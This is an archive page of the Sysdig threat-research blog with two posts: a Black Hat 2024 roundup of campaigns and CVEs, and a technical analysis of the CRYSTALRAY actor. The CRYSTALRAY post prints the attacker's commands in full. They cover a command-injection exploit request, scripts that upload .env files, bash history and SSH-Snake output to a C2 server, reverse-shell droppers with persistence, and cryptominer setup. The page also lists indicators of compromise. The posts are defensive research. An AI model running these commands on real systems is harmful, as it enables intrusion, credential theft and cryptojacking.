Threat Research Archives | Sysdig https://sysdig.com/blog/topic/threat-research/ Tue, 23 Jul 2024 13:18:02 +0000 en-US hourly 1 https://wordpress.org/?v=6.5.5 https://sysdig.com/wp-content/uploads/favicon-150x150.png Threat Research Archives | Sysdig https://sysdig.com/blog/topic/threat-research/ 32 32 Sysdig Threat Research Team – Black Hat 2024 https://sysdig.com/blog/sysdig-threat-research-team-black-hat-2024/ Mon, 22 Jul 2024 14:00:00 +0000 https://sysdig.com/?p=91686 The Sysdig Threat Research Team (TRT)  is on a mission to help secure innovation at cloud speeds. A group of...

The post Sysdig Threat Research Team – Black Hat 2024 appeared first on Sysdig.

]]>
The Sysdig Threat Research Team (TRT)  is on a mission to help secure innovation at cloud speeds.

A group of some of the industry’s most elite threat researchers, the Sysdig TRT discovers and educates on the latest cloud-native security threats, vulnerabilities, and attack patterns.

We are fiercely passionate about security and committed to the cause. Stay up to date here on the latest insights, trends to monitor, and crucial best practices for securing your cloud-native environments.

Below, we will detail the latest research and how we have improved the security ecosystem.

And if you want to chat with us further, look us up at the Sysdig booth at Black Hat 2024!

LLMJACKING

The Sysdig Threat Research Team (TRT) recently observed a new attack known as LLMjacking. This attack leverages stolen cloud credentials to target ten cloud-hosted large language model (LLM) services.

Once initial access was obtained, they exfiltrated cloud credentials and gained access to the cloud environment, where they attempted to access local LLM models hosted by cloud providers: in this instance, a local Claude (v2/v3) LLM model from Anthropic was targeted. If undiscovered, this type of attack could result in over $46,000 of LLM consumption costs per day for the victim.

Sysdig researchers discovered evidence of a reverse proxy for LLMs being used to provide access to the compromised accounts, suggesting a financial motivation.  However, another possible motivation is to extract LLM training data. 

All major cloud providers, including Azure Machine Learning, GCP’s Vertex AI, and AWS Bedrock, now host large language model (LLM) services. These platforms provide developers with easy access to various popular models used in LLM-based AI. 

The attackers are looking to gain access to a large amount of LLM models across different services. No legitimate LLM queries were actually run during the verification phase. Instead, just enough was done to figure out what the credentials were capable of and any quotas. In addition, logging settings are also queried where possible. This is done to avoid detection when using the compromised credentials to run their prompts.

The ability to quickly detect and respond to those threats is crucial for maintaining strong defense systems. Essential tools like Falco, Sysdig Secure, and CloudWatch Alerts help monitor runtime activity and analyze cloud logs to identify suspicious behaviors. Comprehensive logging, including verbose logging, provides deep visibility into the cloud environment’s activities. This detailed information allows organizations to gain a nuanced understanding of critical actions, such as model invocations, within their cloud infrastructure.

SSH-SNAKE

SSH-Snake is a self-modifying worm that leverages SSH credentials discovered on a compromised system to start spreading itself throughout the network. The worm automatically searches through known credential locations and shell history files to determine its next move. SSH-Snake is actively being used by threat actors in offensive operations. 

Sysdig TRT uncovered the command and control (C2) server of threat actors deploying SSH-Snake. This server holds a repository of files containing the output of SSH-Snake for each of the targets they have gained access to. 

Filenames found on the C2 server contain IP addresses of victims, which allowed us to make a high-confidence assessment that these threat actors are actively exploiting known Confluence vulnerabilities in order to gain initial access and deploy SSH-Snake. This does not preclude other exploits from being used, but many of the victims are running Confluence.  

The output of SSH-Snake contains the credentials found, the targets’ IPs, and the victims’ bash history. The victim list is growing, which means that this is an ongoing operation. At the time of writing, the number of victims is approximately 300.

The Rebirth Botnet

In March 2024, the Sysdig Threat Research Team (TRT) began observing attacks against one of our Hadoop honeypot services from the domain “rebirthltd[.]com.” Upon investigation, we discovered that the domain pertains to a mature and increasingly popular DDoS-as-a-Service botnet: the Rebirth Botnet. The service is based on the Mirai malware family, and the operators advertise its services through Telegram and an online store (rebirthltd.mysellix[.]io).

The threat actors operating the botnet are financially motivated and advertise their service primarily to the video gaming community. Although there is no evidence that this botnet is not being purchased beyond gaming-related purposes, organizations may still be at risk of being exploited and being part of the botnet. We’ve taken a detailed look at how this group operates from a business and technical point of view.  

At the core of RebirthLtd’s business is its DDoS botnet, which is rented out to whomever is willing to pay. RebirthLtd offers its services through a variety of packages listed on a web-based storefront that has been registered since August 2022. The cheapest plan, for which a buyer can purchase a subscription and immediately receive access to the botnet’s services, is priced at $15. The basic plan seems to only include access to the botnet’s executables and limited functionalities in terms of the available number of infected clients. More expensive plans include API access, C2 servers availability, and improved features, such as the number of attacks per second that can be launched.

The botnet’s main services target video game streaming platforms for financial gain, as its Telegram channel claims that RebirthHub (another moniker for the botnet, along with RebirthLtd) is capable of “hitting almost all types of game servers.” The Rebirth admin team is quite active on YouTube and TikTok as well, where they showcase the botnet’s capabilities to potential customers. Through our investigation, we detected more than 100 undetected executables of this malware family.

SCARLETEEL

The attack graph discovered by this group is the following: 

Compromise AWS accounts by exploiting vulnerable compute services, gaining persistence, and attempting to make money using crypto miners. Had we not thwarted their attack, our conservative estimate is that their mining would have cost over $4,000 per day until stopped.

We know that they are not only after crypto mining, but stealing intellectual property as well. In their recent attack, the actor discovered and exploited a customer mistake in an AWS policy, which allowed them to escalate privileges to AdministratorAccess and gain control over the account, enabling them to do with it what they wanted. We also watched them target Kubernetes in order to scale their attack significantly.

AMBERSQUID

Keeping with the cloud threats, Sysdig TRT has uncovered a novel cloud-native cryptojacking operation which they’ve named AMBERSQUID. This operation leverages AWS services not commonly used by attackers, such as AWS Amplify, AWS Fargate, and Amazon SageMaker. The uncommon nature of these services means that they are often overlooked from a security perspective, and the AMBERSQUID operation can cost victims more than $10,000/day.

The AMBERSQUID operation was able to exploit cloud services without triggering the AWS requirement for approval of more resources, as would be the case if they only spammed EC2 instances. Targeting multiple services also poses additional challenges, like incident response, since it requires finding and killing all miners in each exploited service.

We discovered AMBERSQUID by analyzing over 1.7M Linux images to understand what malicious payloads are hiding in the container images on Docker Hub.

This dangerous container image didn’t raise any alarms during static scanning for known indicators or malicious binaries. It was only when the container was run that its cross-service cryptojacking activities became obvious. This is consistent with the findings of our 2023 Cloud Threat Report, in which we noted that 10% of malicious images are missed by static scanning alone.

MESON NETWORK

Sysdig TRT discovered a malicious campaign using the blockchain-based Meson service to reap rewards ahead of the crypto token unlock happening around March 15th 2024. Within minutes, the attacker attempted to create 6,000 Meson Network nodes using a compromised cloud account. The Meson Network is a decentralized content delivery network (CDN) that operates in Web3 by establishing a streamlined bandwidth marketplace through a blockchain protocol.

Within minutes, the attacker was able to spawn almost 6,000 instances inside the compromised account across multiple regions and execute the meson_cdn binary. This comes at a huge cost for the account owner. As a result of the attack, we estimate a cost of more than $2,000 per day for all the Meson network nodes created, even just using micro sizes. This isn’t counting the potential costs for public IP addresses which could run as much as $22,000 a month for 6,000 nodes! Estimating the reward tokens amount and value the attacker could earn is difficult since those Meson tokens haven’t had values set yet in the public market.

In the same way, as in the case of AMBERSQUID, the image looks legitimate and safe from a static point of view, which involves analyzing its layers and vulnerabilities. However, during runtime execution, we monitored outbound network traffic, and we spotted gaganode being executed and performing connections to malicious IPs.

Besides actors and new Threats, CVEs

The only purpose of STRT is not to hunt for new malicious actors, it is also to react quickly to new vulnerabilities that appear and to update the product with new rules for their detection in runtime. The last two examples are shown below.

CVE-2024-6387

On July 1st, Qualys’s security team announced CVE-2024-6387, a remotely exploitable vulnerability in the OpenSSH server. This critical vulnerability is nicknamed “regreSSHion” because the root cause is an accidental removal of code that fixed a much earlier vulnerability CVE-2006-5051 back in 2006. The race condition affects the default configuration of sshd (the daemon program for SSH).

OpenSSH versions older than 4.4p1 – unless patched for previous CVE-2006-5051 and CVE-2008-4109) – and versions between 8.5p1 and 9.8p1 are impacted. The general guidance is to update the versions. Ubuntu users can download the updated versions.

The exploitation of regreSSHion involves multiple attempts (thousands, in fact) executed in a fixed period of time. This complexity is what downgrades the CVE from “Critical” classified vulnerability to a “High” risk vulnerability, based mostly on the exploit complexity.

Using Sysdig, we can detect drift from baseline sshd behaviors. In this case, stateful detections would track the number of failed attempts to authenticate with the sshd server. Falco rules alone detect the potential Indicators of Compromise (IoCs). By pulling this into a global state table, Sysdig can better detect the spike of actual, failed authentication attempts for anonymous users, rather than focus on point-in-time alerting.

CVE-2024-3094

On March 29th, 2024, the Openwall mailing list announced a backdoor in a popular package called XZ Utils. This utility includes a library called liblzma, which is used by SSHD, a critical part of the Internet infrastructure used for remote access. When loaded, the CVE-2024-3094 affects the authentication of SSHD, potentially allowing intruders access regardless of the method.

  • Affected versions: 5.6.0, 5.6.1
  • Affected Distributions: Fedora 41, Fedora Rawhide

For Sysdig Secure users, this rule is called “Backdoored library loaded into SSHD (CVE-2024-3094)” and can be found in the Sysdig Runtime Threat Detection policy.

- rule: Backdoored library loaded into SSHD (CVE-2024-3094)

  desc: A version of the liblzma library was seen loading which was backdoored by a malicious user in order to bypass SSHD authentication.

  condition: open_read and proc.name=sshd and (fd.name endswith "liblzma.so.5.6.0" or fd.name endswith "liblzma.so.5.6.1")

  output: SSHD Loaded a vulnerable library (| file=%fd.name | proc.pname=%proc.pname gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4] image=%container.image.repository | proc.cmdline=%proc.cmdline | container.name=%container.name | proc.cwd=%proc.cwd proc.pcmdline=%proc.pcmdline user.name=%user.name user.loginuid=%user.loginuid user.uid=%user.uid user.loginname=%user.loginname image=%container.image.repository | container.id=%container.id | container_name=%container.name|  proc.cwd=%proc.cwd )

  priority: WARNING

 tags: [host,container]

Sysdig Secure Solution

Sysdig Secure enables security and engineering teams to identify and eliminate vulnerabilities, threats, and misconfigurations in real-time. Leveraging runtime insights gives organizations an intuitive way to both visualize and analyze threat data. 

Sysdig Secure is powered by Falco’s unified detection engine. This cutting‑edge engine leverages real‑time behavioral insights and threat intelligence to continuously monitor the multi‑layered infrastructure, identifying potential security incidents. 

Whether it’s anomalous container activities, unauthorized access attempts, supply chain vulnerabilities, identity‑based threats, or simply meeting your compliance requirements, Sysdig ensures that organizations have a unified and proactive defense against these rapidly evolving threats.

MEET SYSDIG TRT AT BLACK HAT 2024

Sysdig Threat Research Team (TRT) members will be onsite at booth #1750 at BlackHat Conference 2024, August 7 – 8 in Las Vegas, to share insights from their findings and analysis of some of the hottest and most important cybersecurity topics this year.

Reserve a time to connect with the Sysdig TRT team at the show!

The post Sysdig Threat Research Team – Black Hat 2024 appeared first on Sysdig.

]]>
CRYSTALRAY: Inside the Operations of a Rising Threat Actor Exploiting OSS Tools https://sysdig.com/blog/crystalray-rising-threat-actor-exploiting-oss-tools/ Thu, 11 Jul 2024 13:50:00 +0000 https://sysdig.com/?p=90547 The Sysdig Threat Research Team (TRT) continued observation of the SSH-Snake threat actor we first identified in February 2024. New...

The post CRYSTALRAY: Inside the Operations of a Rising Threat Actor Exploiting OSS Tools appeared first on Sysdig.

]]>
The Sysdig Threat Research Team (TRT) continued observation of the SSH-Snake threat actor we first identified in February 2024. New discoveries showed that the threat actor behind the initial attack expanded its operations greatly, justifying an identifier to further track and report on the actor and campaigns: CRYSTALRAY. This actor previously leveraged the SSH-Snake open source software (OSS) penetration testing tool during a campaign exploiting Confluence vulnerabilities. 

The team’s latest observations show that CRYSTALRAY’s operations have scaled 10x to over 1,500 victims and now include mass scanning, exploiting multiple vulnerabilities, and placing backdoors using multiple OSS security tools. 

CRYSTALRAY’s motivations are to collect and sell credentials, deploy cryptominers, and maintain persistence in victim environments. Some of the OSS tools the threat actor is leveraging include zmap, asn, httpx, nuclei, platypus, and SSH-Snake.

Released on 4 January 2024, SSH-Snake is a self-modifying worm that leverages SSH credentials discovered on a compromised system to start spreading itself throughout the network.

The worm automatically searches through known credential locations and shell history files to determine its next move.

By avoiding the easily detectable patterns associated with scripted attacks, the tool provides greater stealth, flexibility, configurability and more comprehensive credential discovery than typical SSH worms, therefore being more efficient and successful.

CRYSTALRAY

Technical Analysis

Reconnaissance processes and tools

CRYSTALRAY uses a lot of tools from the legitimate OSS organization, ProjectDiscovery. They include a package manager called pdtm to manage and maintain their open source tools which the attacker also uses. ProjectDiscovery has created a number of tools which we will see CRYSTALRAY abuse in their operations. 

ASN

Rather than massive internet-wide ipv4 scans or very specific IP targets, CRYSTALRAY creates a range of IPs for specific countries to launch scans with more precision than a botnet, but less precision than an APT or ransomware attack. The United States and China combined for over 54% of the known targets. 

The attacker takes advantage of the ASN tool. This script serves the purpose of having a quick OSINT command line tool at their disposal when investigating network data. It can be used as a recon tool by querying Shodan for data about any type of target (CIDR blocks/URLs/single IPs/hostnames). This will quickly give the user a complete breakdown of open ports, known vulnerabilities, known software and hardware running on the target, and more – all without ever sending a single packet to the target.

The attackers use it to generate IPv4/IPv6 CIDR blocks allocated to a given country by querying data from Marcel Bischoff’s country-ip-blocks repo. This (below) would be an example for Mexico:

$> asn -c .mx

The complete command to have a file ready for the automatization is as follows:

$> asn -j -c .mx | jq -r '.results[0].ipv4[]' > mx_cidr.txt

Zmap

Once the targeted IP range is defined, CRYSTALRAY uses zmap to scan specific ports for vulnerable services. zmap is a single packet network scanner designed for internet-wide network surveys that is faster and has fewer false positives than nmap. The attacker uses zmap version 4.1.0 RC1 specifically because it allows multi-port scanning to be more efficient. The following command is a simple example:

zmap -p <list-ports> -o zmap_results.csv -w cidr.txt 

To show the complexity and knowledge of the zmap scan by this attacker, this is an example of the many we discovered.

zmap -p 80,8090,7001,61616 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o port_80_8090_7001_61616.csv -w cn_cidr.txt -b /etc/zmap/blocklist.conf -B 500M
  • -p 80,8090,7001,61616 → default ports for webservers, weblogic, and activemq.
  • –output-module=csv
  • –output-fields=saddr,sport
  • –output-filter=’success=1 && repeat=0′
  • –no-header-row → help automatization
  •  -o port_80_8090_7001_61616.csv
  • -w cn_cidr.txt  → source range IPs
  • -b /etc/zmap/blocklist.conf 
  • -B 500M → bandwidth

We observed the attacker trying to discover many different services during their zmap scans:

  • Activemq
  • Confluence
  • Metabase
  • Weblogic
  • Solr
  • Openfire
  • Rocketmq
  • Laravel

Httpx

Once the attacker have the zmap results, they use httpx, a fast and multi-purpose HTTP toolkit that allows running multiple probes using the retryable http library. The httpx toolkit is designed to maintain result reliability with an increased number of threads. Basically, the tool can be used to verify if a domain is either live or a false positive before checking for known vulnerabilities.

cat zmap_results.csv | sed 's/,/:/g' | sort -u | httpx -t 10000 -rl 1000000 -o httpx_output.txt -stream

Nuclei

With these filtered results, the attackers perform a vulnerability scan using nuclei, a tool commonly used by many attackers. Nuclei is an open source vulnerability scanner that can operate at scale. With powerful and flexible templating, nuclei can be used to model all kinds of security checks.

Below is an example of the command used:

cat httpx_output.txt | grep 8090 | nuclei -tags confluence -s critical -bs 1000 -o confluence_rce.txt -stats -stream -c 1 -rl 1000  

Nuclei outputs which CVEs the target host is affected by. With these results, the attacker has a reliable list that can be used to proceed towards the exploitation phase of the attack. 

Observed CVEs used by this attacker:

  • CVE-2022-44877
  • CVE-2021-3129
  • CVE-2019-18394

Based on their exploitation patterns, CRYSTALRAY likely also took advantage of newer vulnerability tests for Confluence available in nuclei. 

In some cases, they used nuclei tags argument to detect possible honeypots on ports where they scanned, to avoid launching their tools on those targets in order to remain undetected. An example of these honeypot detectors is this project, it is not clear if this one in particular was used.

cat 8098_http*.txt | grep 443 | sort -u | shuf | nuclei -tags honeypot -bs 1000 -c 1 -rl 100000 -o hpots.txt -stats -stream

The screenshot below shows the refinement from where CRYSTALRAY started with their enumeration using zmap, then filtering with httpx, and finally down to a much smaller list using nuclei.

CRYSTALRAY

In total, CRYSTALRAY managed to target more than 1,800 IPs during our research and, based on the data collected, this number may continue to grow. Below is the percentage of IPs per region affected by this campaign.

Initial Access

To gain access to its targets, CRYSTALRAY prefers to leverage existing vulnerability proof of concepts which they modify for their payload. Using the previously gathered list of targets, they perform checks to verify that those potential victims are vulnerable to the exploit they plan to use. The following commands are an example of how CRYSTALRAY conducts this process:

# Services vulnerable on port 2031

cat port_2031_httpx.txt | nuclei -s critical -tags centos -bs 500 -c 2 -rl 100000 -o 2031_nuclei.txt -stats -si 20 -stream

# Generate simple code to test the vulnerability

echo "curl ip.me" | base64

curl -X POST "https://<victim-IP>:2031/login/index.php?login=$(echo${IFS}Y3VybCBpcC5tZQo=${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash)" -H "Host: <victim-IP>:2031" -H "Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82" -H "Content-Length: 40" -H "Origin: <victim-IP>:2031" -H "Content-Type: application/x-www-form-urlencoded" -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" -H "Referer: <victim-IP>:2031/login/index.php?login=failed" -H "Accept-Encoding: gzip, deflate" -H "Accept-Language: en" -H "Connection: close" --data-urlencode "username=root" --data-urlencode "password=toor" --data-urlencode "commit=Login" -k Y3VybCBpcC5tZQo=

# Get the exploit from GitHub and run it to the victim

git clone https://github.com/Chocapikk/CVE-2022-44877

cd CVE-2022-44877

chmod +x script.sh

./script.sh scan <victim-IP>:2031

# Modified the script and upload to their automatization system.

nano script.sh

At the very end, CRYSTALRAY edits the downloaded exploit in order to add the malicious payload, which is often a Platypus or Sliver client. This process is very similar to the other exploits they leverage, all taking advantage of OSS tools and proof of concepts.  

Lateral Movement

To impact as many resources as possible, attacks commonly conduct lateral movement once they achieve remote code execution (RCE). In this section, we will detail the tools and tactics CRYSTALRAY has successfully used to move laterally through victims’ environments.

SSH-SNAKE

TRT has already reported on CRYSTALRAY’s use of the OSS penetration testing tool SSH-SNAKE (two months after its release). SSH-SNAKE is a worm that uses ssh keys and credentials it discovers to propagate to new systems and repeat its processes. All the while, SSH-Snake sends captured keys and bash histories back to its C2 server. 

CRYSTALRAY ran the following command to send the results from victims to their C2:

if command -v curl >/dev/null 2>&1; then curl --max-time 100 https://raw.githubusercontent.com/MegaManSec/SSH-Snake/main/Snake.nocomments.sh | bash > /tmp/ssh.txt; id=$(curl -4 ip.me); curl --max-time 100 --user '<creds>' --upload-file "/tmp/ssh.txt" "<c2_server>/${id}_ssh.txt"; rm -f /tmp/ssh.txt; fi

The image below is an example of SSH keys identified in the output of the SSH-Snake tool:

Collection / Credential Access

Environment Credentials

Attackers don’t just want to move between servers accessible via SSH. TRT discovered that CRYSTALRAY tried to move to other platforms, such as cloud providers. Attackers are looking for credentials in environment variables, as TRT also reported in SCARLETEEL, to exponentially grow their impact. This credential discovery process is automatically performed on all devices to which the attacker gains access. The following commands are the way that attackers are getting the credentials and uploading them:

tmp=$(find / -type f -name "*.env" -o -name "*.env.bak" -o -name "*config.env" -o -name "*.env.dist" -o -name "*.env.dev" -o -name "*.env.local" -o -name "*.env.backup" -o -name "*.environment" -o -name "*.envrc" -o -name "*.envs" -o -name "*.env~" | grep -v 'Permission denied' > tmp.txt; sed 's/^/cat /;' tmp.txt > cmd.sh; chmod +x cmd.sh; > /dev/null)

exe=$(bash cmd.sh > <env_variables>.txt)

path=$(find / -type f -name env_variables.txt | grep -v 'Permission denied')

id=$(curl -4 ip.me)

curl --upload-file $path <C2_server>/${id}_env_variables.txt

rm -f cmd.sh env_variables.txt tmp.txt

The attackers use them in the future or sell them on black markets, such as telegram, where bulks of found credentials are sold.

History Files

Bash command histories provide valuable information, but their extraction is not common among attackers because it is hard to process automatically. CRYSTALRAY uses two repositories to speed up this discovery of sensitive information hosted on the system. These are:

In this case, we know that it was extracted and stored on CRYSTALRAY’s servers, likely to analyze or search for more credentials or tokens that may arise from the data collected.

if command -v curl >/dev/null 2>&1; then

    tmpfile=$(mktemp -p /tmp); find / -name .bash_history -exec cat {} + 2>/dev/null > "$tmpfile" ; if [ -s "$tmpfile" ]; then id=$(curl -4 ip.me); curl --user '<creds>' --upload-file "$tmpfile" "<c2_server>/${id}_bash_history.txt"; fi; rm -f "$tmpfile"

fi

In the data previously during the original SSH-SNAKE investigation, we found 100 command histories. This number has expanded to more than 300 at the time of this report. 

Command and Control / Persistence 

Maintaining access to compromised systems is often a priority for attackers. This is a common practice that TRT has reported on twice before:

  • RUBYCARP is a recent case where it used IRC servers for both internal and botnet communications. It was focused on phishing campaigns and brute force attacks.
  • Rebirthltd was based on a modified Mirai binary. It attacked gaming servers and used telegram as a base of operations and to sell its services.

Sliver

Spotted within their injection scripts, TRT discovered a script built to execute a strange payload. During analysis, researchers found that this binary is a payload generated with Sliver. Sliver is an open source cross-platform adversary emulation/red team framework that can be used by organizations of all sizes to perform security testing. Sliver’s implants support C2 over Mutual TLS (mTLS), WireGuard, HTTP(S), and DNS, and are dynamically compiled with per-binary asymmetric encryption keys.

echo "hostctl"

if [ ! -f /tmp/hostctld ]; then

    download_file "<c2_server>/hostctld" "/tmp/hostctld"

    sleep 1

    chmod +x /tmp/hostctld

    nohup /tmp/hostctld >/dev/null 2>&1 &

fi

if ! pgrep -f /tmp/hostctld > /dev/null; then

    nohup /tmp/hostctld >/dev/null 2>&1 &

fi

if [ "$(id -u)" -eq 0 ]; then

    if command -v systemctl &>/dev/null; then

        systemctl stop ext4; systemctl disable ext4; systemctl stop sshb; systemctl disable sshb

        echo "User is root and systemctl is installed."

        curl -v --user "<creds>" <c2_server>/hostctld --output /usr/bin/hostctld && chmod +x /usr/bin/hostctld && chattr +i /usr/bin/hostctld

        echo -e "[Unit]\nDescription=Host Control Daemon\n\n[Service]\nExecStart=/usr/bin/hostctld\nRestart=always\nRestartSec=30\n\n[Install]\nWantedBy=multi-user.target" > /etc/systemd/system/hostctld.service

CRYSTALRAY runs the binary to maintain access to the system and connect to a specific port on the C2 server. Basically, it logs victims when they successfully exploit.

The actor also hosted two other payloads that have the same purpose – db.exe, similar to the previous one, and linux_agent, created with the pentester tool emp3ror, a post-exploitation framework for Linux/Windows – but TRT has not discovered if they have been used. All the IoCs are reported here.

Platypus

Researchers discovered the dashboard CRYSTALRAY used to manage their victims based on an open source tool called Platypus, a modern multiple reverse shell sessions/clients web-based manager written in go. The installation is quite simple. Below is an example running the binary of the latest version. In the following image, we can see the output:

Platypus was previously reported in a cyptomining operation. TRT found more Platypus dashboards using Shodan and Censys Internet mapping services. By querying the default dashboard port, 7331, and ports 13338 and 13339, which are used to manage reverse shell connections, researchers were able to locate more instances of Platypus. Default ports can be changed, so there are likely more out there.

Censys Dashboard

CRYSTALRAY ran Platypus on their server. Their dashboard has reset several times because it is an active campaign and the number of victims varies from 100 to 400 based on uptime. This is a screenshot of the dashboard:

Platypus Dashboard

CRYSTALRAY’s victims are added to the C2 using the following commands (below). It is also interesting to see how they look for a directory that they have write permission for.

writable_dir=$(find / -type d \( -writable -a ! -path "/tmp" -a ! -path "/tmp/*" \) -print -quit 2>/dev/null)

cd $writable_dir && curl -fsSL http://<c2_server>:13339/termite/<c2_server>:19951 -o wt && chmod +x wt && nohup ./wt >/dev/null 2>&1 &

writable_dir_2=$(find /var -type d \( -writable -a ! -path "/tmp" -a ! -path "/tmp/*" \) -print -quit 2>/dev/null)

cd $writable_dir_2 && wget -q http://<c2_server>/termite/<c2_server>:44521 -O .sys && chmod +x .sys && nohup ./.sys >/dev/null 2>&1 &

writable_dir_3=$(find /home -type d \( -writable -a ! -path "/tmp" -a ! -path "/tmp/*" \) -print -quit 2>/dev/null)

cd $writable_dir_3 && wget -q http://<c2_server>:13339/termite/<c2_server>:13337 -O netd && chmod +x netd && nohup ./netd >/dev/null 2>&1 &

Impact of CRYSTALRAY

Selling Credentials

As mentioned before, CRYSTALRAY is able to discover and extract credentials from vulnerable systems, which are then sold on black markets for thousands of dollars. The credentials being sold involve a multitude of services, including Cloud Service Providers and SaaS email providers.  

The raw data stolen from compromised hosts is stored in files on the attacker’s C2 server. Below is an example of a list of files. The filename starts with the IP address of the victim. 

As TRT found through CRYSTALRAY’s cryptomining activities, the attackers use an email address: contact4restore@airmail[.]cc. Using contact4restore, researchers searched for other related accounts and found contact4restore@proton[.]me. 

Cryptomining

As is typical in cloud attacks, once the attackers have access, they try to use victim resources for financial gain. CRYSTALRAY has two associated cryptominers. One looks older and does not hide much and the other is more sophisticated, with the pool to which it was connecting hosted on the same C2 server.

The old script contains the following content to add the script to the crontab and download and run the miner. 

crontab -r

(crontab -l 2>/dev/null; echo "* * * * * curl -v --user 'qwerty:abc123' <c2_server>/lr/rotate --output /tmp/rotate && sh /tmp/rotate && rm -f /tmp/rotate") | crontab -

curl -v --user '<creds>' <c2_server>/lr/lr_linux --output /tmp/logrotate && chmod +x /tmp/logrotate

    /tmp/logrotate -o 51.222.12.201:10900 -u ZEPHYR3LgJXAXUmG23rRkN8LAALmt78re3a8PhWnnw5x8EZ5oEStbUuAWvyHnVUWL6EgURTv3MJeaXvn8HAfRQRNGhc89mAy8Ew3J.mx/contact4restore@airmail.cc -p x -a "rx/0" --no-huge-pages --background

The found wallet is connected to nanopool and some of the workers who match the scripts are connected. Approximately, they are mining around $200/month.

In a new script used in attacks over the course of April and May, CRYSTALRAY used a handcrafted config file with the pools hosted in the same server used to store the results or host the command and control. In this case, TRT was unable to check balances or wallets associated with their operations.

cat > /usr/bin/config.json <<EOF

{

    "autosave": true,

    "cpu": {

        "enabled": true,

        "huge-pages": true,

        "yield": true,

        "max-threads-hint": 100

    },

    "opencl": false,

    "cuda": false,

    "randomx": {

        "init": -1,

        "init-avx2": -1,

        "mode": "auto",

        "1gb-pages": true,

        "rdmsr": true,

        "wrmsr": true,

        "cache_qos": false,

        "numa": true,

        "scratchpad_prefetch_mode": 1

    },

    "pools": [

        {

            "url": "<c2_server>:3333"

        },

        {

            "url": "<c2_server>:3333"

        }

    ]

}

EOF

if ! pgrep -x "logrotate" > /dev/null

then

    # The process is not running, execute your commands here

    echo "logrotate is not running. Executing commands..."

    # Replace the following line with the commands you want to execute

    curl -v --user '<creds>' <c2_server>/lr/lr_linux --output /tmp/logrotate && chmod +x /tmp/logrotate

    /tmp/logrotate -o <c2_server>:3333 --background --cpu-no-yield

curl -v --user '<creds>' <c2_server>/lr_linux --output /usr/bin/log_rotate && chmod +x /usr/bin/log_rotate && chattr +i /usr/bin/log_rotate

        echo -e "[Unit]\nDescription=Host Control Daemon\n\n[Service]\nExecStart=/usr/bin/log_rotate\nRestart=always\nRestartSec=30\n\n[Install]\nWantedBy=multi-user.target" > /etc/systemd/system/log_rotate.service

Kill Competitor Processes

CRYSTALRAY also has a script to remove other cryptominers that victims may already have running. This is a common tactic used by attackers to make sure they have sole use of all of the victims’ resources. Since many attackers are covering the same attack surfaces, they may likely come across previously compromised systems. 

Recommendations

CRYSTALRAY’s operations prove how easily an attacker can maintain and control access to victim networks using only open source and penetration testing tools. Therefore, implementing detection and prevention measures to withstand attacker persistence is necessary. 

The first step to avoid the vast majority of these automated attacks is to reduce the attack surface through vulnerability, identity, and secrets management. CRYSTALRAY is only one instance, but TRT is seeing automated cloud attacks more often.

If it is necessary to expose your applications to the Internet, they may be vulnerable at some point. Therefore, organizations must prioritize vulnerability remediation to reduce the risk of their exposure.

Finally, it is necessary to have cameras/runtime detection that enables you to know — at any moment — if you have been successfully attacked, to take remedial action, and to perform a more thorough forensic analysis and solve the root cause.

Conclusion

CRYSTALRAY is a new threat actor who prefers to use multiple OSS tools to perform widespread vulnerability scanning and exploitation. Once they gain access, they install one of several backdoors to keep control of the target. SSH-snake is then used to spread throughout a victim’s network and collect credentials to sell. Cryptominers are also deployed to gain further monetary value from the compromised assets. 

IoCs

Network
82[.]153.138.25c2
157[.]245.193.241c2
45[.]61.143.47c2
aextg[.]us[.]toc2
linux[.]kyun[.]lic2
ww-1[.]us[.]toc2
Binaries
CMiza22b0b20052e65ad713f5c3a7427b514ee4f2388f6fda0510e3f5c9ebc78859e  
HQdIc98d1d7686b5ff56e50264442ac27d4fb443425539de98458b7cfbf6131b606f  
igx1da2bd678a49f428353cb570671aa04cddce239ecb98b825220af6d2acf85abe9 
pmqE06bdd9a6753fba54f2772c1576f31db36f3b2b4e673be7e1ec9af3b180144eb9
Y3Ehda2bd678a49f428353cb570671aa04cddce239ecb98b825220af6d2acf85abe9
agent_linux6a7b06ed7b15339327983dcd7102e27caf72b218bdaeb5b47d116981df093c52
backup.shdb029555a58199fa6d02cbc0a7d3f810ab837f1e73eb77ec63d5367fa772298b
db.exef037d0cc0a1dc30e92b292024ba531bd0385081716cb0acd9e140944de8d3089
hostctld1da7479af017ec0dacbada52029584a318aa19ff4b945f1bb9a51472d01284ec
logrotateb04db92036547d08d1a8b40e45fb25f65329fef01cf854caa1b57e0bf5faa605
lr_bionicfdced57d370ba188380e681351c888a31b384020dff7e029bd868f5dce732a90
lr_focal673a399699ce8dad00fa2dffee2aab413948408e807977451ccd0ceaa8b00b04
lr_linux364a7f8e3701a340400d77795512c18f680ee67e178880e1bb1fcda36ddbc12c
processlib2.so8cbec5881e770ecea451b248e7393dfcfc52f8fbb91d20c6e34392054490d039
processlib.so908d7443875f3e043e84504568263ec9c39c207ff398285e849a7b5f20304c21
rbmx2b945609b5be1171ff9ea8d1ffdca7d7ba4907a68c6f91d409dd41a06bb70154
recon.sha544d0ffd75918a4e46108db0ba112b7e95a88054ec628468876c7cf22c203a3
remove_bg.sh04fec439f2f08ec1ad8352859c46f865a6353a445410208a50aa638d93f49451
remove.sh5a35b7708846f96b3fb5876f7510357c602da67417e726c702ddf1ad2e71f813
rfmx7d003d3f5de5044c2c5d41a083837529641bd6bed13769d635c4e7f1b9147295
rotate7be2b15b56da32dc5bdb6228c2ed5c3bf3d8fc6236b337f625e3aff73a5c11d3
rotate_cn_rt08aaf6a45c17fa38958dd0ed1d9b25126315c6e0d93e7800472d0853ad696a87
rotate_low4f20eb19c627239aaf91c662da51ca7f298526df8e0eadccb6bbd7fc1bbcf0b3
xmrig_arm640841a190e50c6022100c4c56c233108aa01e5da60ba5a57c9778135f42def544
